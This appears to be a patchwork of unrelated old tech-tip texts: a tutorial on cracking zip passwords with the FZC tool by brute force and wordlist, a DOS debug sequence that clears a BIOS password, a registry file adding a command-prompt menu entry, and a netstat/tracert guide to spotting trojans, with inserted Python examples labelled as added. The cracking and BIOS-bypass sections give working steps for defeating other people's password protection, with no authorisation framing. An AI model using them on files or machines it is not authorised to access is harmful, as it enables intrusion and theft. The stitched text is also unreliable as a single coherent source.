    We need to keep in mind that some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack with a wordlist (unless you have some weird wordlist). If you have bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB list and start using the Brute Force attack.
    If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

    Now that we've gone through all the theoretical stuff, let's get to the actual commands.


    --------------------------------------------------------------------------------
    Bruteforce
    --------------------------------------------------------------------------------


    The command line you'll need to use for brute force is:

    fzc -mb -nzFile.zip -lChr Length -cType of chars

    Now if you read the bforce.txt that comes with fzc you'll find the description of how Chr Length and the Type of chars work, but hey, I'm gonna explain this too. Why not, right?... (but remember to look at the bforce.txt too)

    For Chr Length you can use 4 kinds of switches...

    -> You can use a range -> 4-6 :it would brute force from 4 chr passwords to 6 chr passwords
    -> You can use just one length -> 5 :it would just brute force using passwords with 5 chars
    -> You can also use the "all" number -> 0 :it would start brute forcing from passwords of length 0 to length 32; even if you are crazy I don't think that you would do this.... if you are thinking of doing this get a life...
    -> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords of length 3 to passwords with 32 chars of length, almost like the last option...

    For the Type of chars we have 5 switches, they are:

    -> a for using lowercase letters
    -> A for using uppercase letters
    -> ! for using symbols (check the Bforce.txt if you want to see which symbols)
    -> s for using space
    -> 1 for using numbers


    Example:
    If you want to find a password with lowercase and numbers by brute force you would just do something like:

    fzc -mb -nzTest.zip -l4-7 -ca1

    This would try all combinations from passwords with 4 chars of length up to 7 chars, but just using numbers and lowercase.

    *****
    hint
    *****

    You should never start the first brute force attack on a file using all the char switches. First just try lowercase, then uppercase, then uppercase with numbers, then lowercase with numbers; do it like this because you can get lucky and find the password much faster. If this doesn't work, prepare your brain and start a brute force that will take a lot of time, with a combination like lowercase, uppercase, special chars and numbers.
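    Added example, not part of the tutorial or of FZC itself: a Python estimate of how many candidates a run described by FZC's -l and -c switches has to try in the worst case, which is the arithmetic behind the hint above and the earlier remark that a 32-char password would take an immortal. The alphabet size for the "!" switch is an assumption (the tutorial defers the real symbol list to Bforce.txt), and the guess rate is a constructed figure, not a measured FZC speed.

```python
"""Keyspace estimate for FZC-style -l / -c brute-force switches.
Added example; not part of the tutorial or of the FZC program."""

MAX_LEN = 32  # the tutorial gives 32 chars as the longest password FZC accepts

# Alphabet size contributed by each -c switch. The 32 for "!" is an assumption:
# the tutorial only says "check Bforce.txt" for the real symbol list.
CHARSET_SIZES = {"a": 26, "A": 26, "1": 10, "s": 1, "!": 32}


def parse_length_switch(spec):
    """Interpret the four -l forms the tutorial lists: '4-6', '5', '0', '3+'.
    Returns (shortest, longest) password length to try."""
    spec = spec.strip()
    if spec == "0":                      # "all": every length from 0 to 32
        return 0, MAX_LEN
    if spec.endswith("+"):               # "3+": from 3 up to the 32 maximum
        return int(spec[:-1]), MAX_LEN
    if "-" in spec:                      # "4-6": an explicit range
        low, high = (int(p) for p in spec.split("-", 1))
        return low, high
    n = int(spec)                        # "5": exactly one length
    return n, n


def alphabet_size(char_switches):
    """Size of the alphabet selected by a -c argument such as 'a1' (36)."""
    unknown = set(char_switches) - set(CHARSET_SIZES)
    if unknown:
        raise ValueError(f"unknown -c switch(es): {sorted(unknown)}")
    return sum(CHARSET_SIZES[c] for c in set(char_switches))


def candidate_count(length_spec, char_switches):
    """Worst-case number of passwords tried for -l<length_spec> -c<char_switches>:
    the sum of alphabet**n over every length n in the range."""
    low, high = parse_length_switch(length_spec)
    size = alphabet_size(char_switches)
    return sum(size ** n for n in range(low, high + 1))


def worst_case_days(length_spec, char_switches, guesses_per_second):
    """Worst-case run time in days at a given guess rate."""
    return candidate_count(length_spec, char_switches) / guesses_per_second / 86400


if __name__ == "__main__":
    RATE = 1_000_000  # constructed figure, not a measured FZC speed
    # The tutorial's own example: fzc -mb -nzTest.zip -l4-7 -ca1
    print("-l4-7 -ca1 :", candidate_count("4-7", "a1"), "candidates,",
          round(worst_case_days("4-7", "a1", RATE), 2), "days")
    # Why the hint says to grow the charset step by step:
    for switches in ("a", "A1", "a1", "aA1!"):
        print(f"-l6 -c{switches:5}:", f"{worst_case_days('6', switches, RATE):.3f} days")
    # And why a 32-char password needs an immortal:
    print("-l32 -caA1!:", f"{worst_case_days('32', 'aA1!', RATE):.3e} days")
```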


    --------------------------------------------------------------------------------
    Wordlist
    --------------------------------------------------------------------------------

    Like I said before, and like you should be thinking now, the wordlist is the most powerful mode in this program. Using this mode, you can choose between 3 modes, each of which makes some changes to the text that is in the wordlist. I'm not going to say what each mode does to the words; to know that just check the file wlist.txt. The only thing I'm going to tell you is that the best mode for getting passwords is mode 3, but it takes longer too.
    To start a wordlist attack you'll do something like:

    fzc -mwMode number -nzFile.zip -nwWordlist

    Where:

    Mode number is 1, 2 or 3; just check wlist.txt to see the changes in each mode.
    File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory as FZC you'll need to give the full path.

    You can add other switches to that line, like -fLine, where you define at which line FZC will start reading, and -lChar Length, which makes it read only the words of that char length; the switch works like in bruteforce mode.
    So if you do something like

    fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

    FZC would just start reading at line 50 and would only read words with length >= 9.

    Example:

    If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

    fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50





    --------------------------------------------------------------------------------
    Resuming
    --------------------------------------------------------------------------------

    Another good feature in FZC is that FZC supports resuming. If you need to shut down your computer while FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc, but if you are using a wordlist it will tell you at what line it stopped (you can find the line in the file fzc.log too).
    To resume the bruteforce attack you just need to do:

    fzc -mr

    And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
    But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack on file.zip at line 100, using wordlist.txt in mode 3, to resume you'll type

    fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

    Doing this FZC would start at line 100, since the other 99 lines were already checked in an earlier FZC session.


    Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program.

    The Best Way to Change Bios Password

    Here is the best way to change the bios password in win 95/98:

    Follow the steps below:

    1) Boot up Windows.
    2) Go to the DOS prompt, or go to the command prompt directly from the Windows start-up menu.

    3) Type the command at the prompt: "debug" (without quotes)
    4) Type the following lines now exactly as given.......
    o 70 10
    o 71 20
    quit
    exit

    5) Exit from the DOS prompt and restart the machine


    password protection gone!!!!!!!!!!!!!

    EnjoYYYYYYYYYY

    PS: I tested this in Award BIOS........
    There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, everything will be fine...........

    I have not found any other trouble if the codes are used.

    To be on the safe side, just back up your data..........


    The use of this code is entirely at your risk.......... It worked fine for me..........

    Use CMD Prompt to add to folder context menu Windows Xp

    Adds an "Open Command Prompt" entry to the context menu of folders,
    and also of drives and My Computer.

    Copy what's in the code area to Notepad and save it as cmd here.reg

    Windows Registry Editor Version 5.00

    ; "cd /d" changes the drive as well as the directory, so the prompt lands
    ; in the clicked folder even when it is on a different drive from the one
    ; cmd.exe starts on (a plain "cd" would only change the directory).
    [HKEY_CLASSES_ROOT\Drive\shell\cmd]
    @="Command Prompt"

    [HKEY_CLASSES_ROOT\Drive\shell\cmd\command]
    @="cmd.exe /k cd /d \"%L\""

    [HKEY_CLASSES_ROOT\Directory\shell\cmd]
    @="Command Prompt"

    [HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
    @="cmd.exe /k cd /d \"%L\""

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd]
    @="Command Prompt"

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd\command]
    @="cmd.exe /k cd /d \"%L\""

    Check For Dos, Check to see if you are infected

    When you first turn on your computer (BEFORE DIALING INTO YOUR ISP),
    open an MS-DOS Prompt window (Start/Programs/MS-DOS Prompt).
    Then type netstat -arn and press the Enter key.

    Your screen should display the following (without the dotted lines,
    which I added for clarification).

    -----------------------------------------------------------------------------
    Active Routes:

    Network Address   Netmask           Gateway Address   Interface   Metric
    127.0.0.0         255.0.0.0         127.0.0.1         127.0.0.1   1
    255.255.255.255   255.255.255.255   255.255.255.255   0.0.0.0     1

    Route Table

    Active Connections

    Proto Local Address Foreign Address State

    --------------------------------------------------------------------------------

    If you see anything else, there might be a problem (more on that later).
    Now dial into your ISP; once you are connected,
    go back to the MS-DOS Prompt and run the same command as before,
    netstat -arn. This time it will look similar to the following (without
    dotted lines).

    -------------------------------------------------------------------------------------

    Active Routes:

    Network Address   Netmask           Gateway Address   Interface      Metric
    0.0.0.0           0.0.0.0           216.1.104.70      216.1.104.70   1
    127.0.0.0         255.0.0.0         127.0.0.1         127.0.0.1      1
    216.1.104.0       255.255.255.0     216.1.104.70      216.1.104.70   1
    216.1.104.70      255.255.255.255   127.0.0.1         127.0.0.1      1
    216.1.104.255     255.255.255.255   216.1.104.70      216.1.104.70   1
    224.0.0.0         224.0.0.0         216.1.104.70      216.1.104.70   1
    255.255.255.255   255.255.255.255   216.1.104.70      216.1.104.70   1

    Route Table

    Active Connections

    Proto  Local Address       Foreign Address   State
    TCP    0.0.0.0:0           0.0.0.0:0         LISTENING
    TCP    216.1.104.70:137    0.0.0.0:0         LISTENING
    TCP    216.1.104.70:138    0.0.0.0:0         LISTENING
    TCP    216.1.104.70:139    0.0.0.0:0         LISTENING
    UDP    216.1.104.70:137    *:*

    --------------------------------------------------------------------------------

    What you are seeing in the first section (Active Routes) under the heading of
    Network Address are some additional lines. The only ones that should be there
    are ones belonging to your ISP (more on that later). In the second section
    (Route Table) under Local Address you are seeing the IP address that your ISP
    assigned you (in this example 216.1.104.70).

    The numbers are divided into four dot notations; the first three should be
    the same for both sets, while in this case the .70 is the unique number
    assigned for THIS session. Next time you dial in that number will more than
    likely be different.

    To make sure that the first three notations are as they should be, we will run
    one more command from the MS-DOS window.
    From the MS-DOS Prompt type tracert www.yourispwebsite.com (or .net,
    or whatever it ends in). Following is an example of the output you should see.

    ---------------------------------------------------------------------------------------

    Tracing route to www.motion.net [207.239.117.112] over a maximum of 30 hops:
      1   128 ms  2084 ms   102 ms  chat-port.motion.net [216.1.104.4]
      2   115 ms   188 ms   117 ms  chat-core.motion.net [216.1.104.1]
      3   108 ms   116 ms   119 ms  www.motion.net [207.239.117.112]
    Trace complete.

    ------------------------------------------------------------------------------------------

    You will see that on lines 1 and 2 the first three notations of the
    address match what we saw above, which is a good thing. If they do not,
    then some further investigation is needed.

    If everything matches like above, you can almost breathe easier. Another thing
    which you should check is programs launched during startup. To find
    these, click Start/Programs/Startup and look at what shows up. You should be
    able to recognize everything there; if not, once again more investigation is
    needed.

    -------------------------------------------------------------------------------------------

    Now just because everything reported out like we expected (and demonstrated
    above) we still are not out of the woods. How is this so, you ask? Do you use
    NetMeeting? Do you get on IRC (Internet Relay Chat)? Or any other program
    that makes use of the Internet? Have you ever received an email with an
    attachment that ended in .exe? The list goes on and on; basically anything
    that you run could have become infected with a trojan. What this means is
    the program appears to do what you expect, but also does just a little more.
    This little more could be blasting ebay.com or one of the other sites that
    CNNlive was talking about.

    What can you do? Well, some anti-virus software will detect some trojans.
    Another (tedious) thing is to start each of these "extra" Internet programs
    one at a time and go through the last two steps above, looking at the routes
    and connections the program uses. However, the tricky part will be figuring
    out where to tracert to in order to find out if the addresses you see in
    step 2 are "safe" or not. I should forewarn you that running tracert after
    tracert, after tracert might be considered "improper" by your ISP. The steps
    outlined above may not work exactly as I have stated depending upon your ISP,
    but with a true ISP it should work. Finally, this advice comes with NO
    warranty and by following my "hints" you implicitly release me from ANY and
    ALL liability which you may incur.
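    The two checks the article walks through, as an added Python example that is not part of the original text: compare the "Active Connections" lines of a netstat run against the clean baseline shown earlier (only the NetBIOS listeners on TCP 137-139 and UDP 137, nothing established) and confirm that the assigned address shares its first three dotted notations with the tracert hops. The sample netstat lines are constructed from the article's own values; the 203.0.113.9 address and port 6667 are made-up entries added to show what a finding looks like.

```python
"""Baseline check over netstat 'Active Connections' lines, plus the
first-three-octets comparison the article uses with tracert.
Added example; not part of the original article."""
import re

# Constructed sample in the layout of the article's second "netstat -arn" run.
# The first five connection lines match the clean session; the last two do not.
SAMPLE_NETSTAT = """\
Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:0 0.0.0.0:0 LISTENING
TCP 216.1.104.70:137 0.0.0.0:0 LISTENING
TCP 216.1.104.70:138 0.0.0.0:0 LISTENING
TCP 216.1.104.70:139 0.0.0.0:0 LISTENING
UDP 216.1.104.70:137 *:*
TCP 216.1.104.70:12345 0.0.0.0:0 LISTENING
TCP 216.1.104.70:1031 203.0.113.9:6667 ESTABLISHED
"""

# What the article's clean session listed: (protocol, local port).
BASELINE_LISTENERS = {("TCP", 0), ("TCP", 137), ("TCP", 138), ("TCP", 139), ("UDP", 137)}

# One connection line: proto, local ip:port, foreign ip:port, optional state.
LINE_RE = re.compile(r"^(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)(?:\s+(\S+))?$")


def parse_connections(text):
    """Return (proto, local_ip, local_port, foreign_ip, foreign_port, state)
    tuples for every connection line; headers and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        proto, lip, lport, fip, fport, state = match.groups()
        rows.append((proto, lip, None if lport == "*" else int(lport),
                     fip, None if fport == "*" else int(fport), state or ""))
    return rows


def unexpected_entries(rows, baseline=BASELINE_LISTENERS):
    """The article's 'anything else': listeners missing from the baseline and
    any connection already established to a foreign host."""
    findings = []
    for proto, lip, lport, fip, fport, state in rows:
        if state == "ESTABLISHED":
            findings.append(f"{proto} {lip}:{lport} -> {fip}:{fport} ESTABLISHED")
        elif (proto, lport) not in baseline:
            findings.append(f"{proto} listener on port {lport} not in baseline")
    return findings


def same_first_three(ip_a, ip_b):
    """The article's tracert check: the first three dotted notations match."""
    return ip_a.split(".")[:3] == ip_b.split(".")[:3]


if __name__ == "__main__":
    rows = parse_connections(SAMPLE_NETSTAT)
    for finding in unexpected_entries(rows):
        print("INVESTIGATE:", finding)
    # Assigned address vs. the hops from the article's tracert output.
    for hop in ("216.1.104.4", "216.1.104.1", "207.239.117.112"):
        print(hop, "same network as 216.1.104.70:", same_first_three("216.1.104.70", hop))
```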


    Other options

    netstat displays protocol statistics and current TCP/IP network connections.
    netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

    -a        Display all connections and listening ports.
    -e        Display Ethernet statistics. This may be combined with the -s option.
    -n        Display addresses and port numbers in numerical form.
    -p proto  Show connections for the protocol specified by proto; proto may be
              TCP or UDP. If used with the -s option to display per-protocol
              statistics, proto may be TCP, UDP, or IP.
    -r        Display the routing table.
    -s        Display per-protocol statistics. By default, statistics are shown for
              TCP, UDP and IP; the -p option may be used to specify a subset of the default.
    interval  Redisplay selected statistics, pausing interval seconds between each
              display. If omitted, netstat prints the current configuration information
              once.